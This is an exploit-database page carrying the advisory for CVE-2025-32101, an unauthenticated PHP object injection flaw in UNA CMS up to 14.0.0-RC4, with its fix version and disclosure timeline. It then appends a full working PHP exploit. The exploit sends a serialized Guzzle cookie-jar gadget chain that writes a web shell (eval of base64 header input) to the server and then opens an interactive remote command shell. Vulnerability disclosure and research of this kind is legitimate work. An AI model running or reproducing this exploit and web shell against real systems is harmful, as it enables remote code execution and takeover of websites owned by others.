## https://sploitus.com/exploit?id=PACKETSTORM:190366
------------------------------------------------------------------------------------
UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection
Vulnerability
------------------------------------------------------------------------------------
[-] Software Links:
https://unacms.com
https://github.com/unacms/una
[-] Affected Versions:
All versions from 9.0.0-RC1 to 14.0.0-RC4.
[-] Vulnerability Description:
The vulnerability is located in the
/template/scripts/BxBaseMenuSetAclLevel.php script. Specifically,
within the BxBaseMenuSetAclLevel::getCode() method. When calling this
method, user input passed through the "profile_id" POST parameter is
not properly sanitized before being used in a call to the
unserialize() PHP function. This can be exploited by remote,
unauthenticated attackers to inject arbitrary PHP objects into the
application scope, allowing them to perform a variety of attacks, such
as writing and executing arbitrary PHP code.
[-] Proof of Concept:
https://karmainsecurity.com/pocs/CVE-2025-32101.php
[-] Solution:
Upgrade to version 14.0.0-RC5 or later.
[-] Disclosure Timeline:
[25/03/2025] - Vendor notified
[29/03/2025] - CVE identifier requested
[01/04/2025] - Version 14.0.0-RC5 released
[04/04/2025] - CVE identifier assigned
[07/04/2025] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-2025-32101 to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2025-01
-------------
Packet Storm appended proof of concept:
<?php
/*
------------------------------------------------------------------------------------
UNA CMS <= 14.0.0-RC4 (BxBaseMenuSetAclLevel.php) PHP Object Injection Vulnerability
------------------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://unacms.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Vulnerability Description:
The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script.
Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this
method, user input passed through the "profile_id" POST parameter is not properly
sanitized before being used in a call to the unserialize() PHP function. This can be
exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into
the application scope, allowing them to perform a variety of attacks, such as
writing and executing arbitrary PHP code.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2025-01
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "\n+------------------------------------------------------------+";
print "\n| UNA CMS <= 14.0.0-RC4 PHP Object Injection Exploit by EgiX |";
print "\n+------------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 2)
{
print "\nUsage......: php $argv[0] <URL>\n";
print "\nExample....: php $argv[0] http://localhost/una/";
print "\nExample....: php $argv[0] https://unacms.com/\n\n";
die();
}
define('ON_APACHE', true);
define('SH_PATH', ON_APACHE ? './cache_public/sh.phtml' : './cache_public/sh.php');
class GuzzleHttp_Cookie_SetCookie
{
private $data = ['Expires' => '', 'Value' => '<?php eval(base64_decode($_SERVER[\'HTTP_C\'])); ?>'];
}
class GuzzleHttp_Cookie_FileCookieJar
{
private $cookies, $filename = SH_PATH, $storeSessionCookies = true;
function __construct()
{
$this->cookies = [new GuzzleHttp_Cookie_SetCookie];
}
}
$url = $argv[1];
$ch = curl_init();
$chain = serialize(new GuzzleHttp_Cookie_FileCookieJar);
$chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain);
$chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain);
curl_setopt($ch, CURLOPT_URL, "{$url}menu.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["X-Requested-With: XMLHttpRequest"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=" . urlencode($chain));
print "\n[+] Performing PHP Object Injection";
curl_exec($ch); curl_close($ch);
print "\n[+] Launching shell\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url . SH_PATH);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
$phpcode = "print '____'; print shell_exec(base64_decode('%s')); print '____';";
while(1)
{
print "\nuna-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}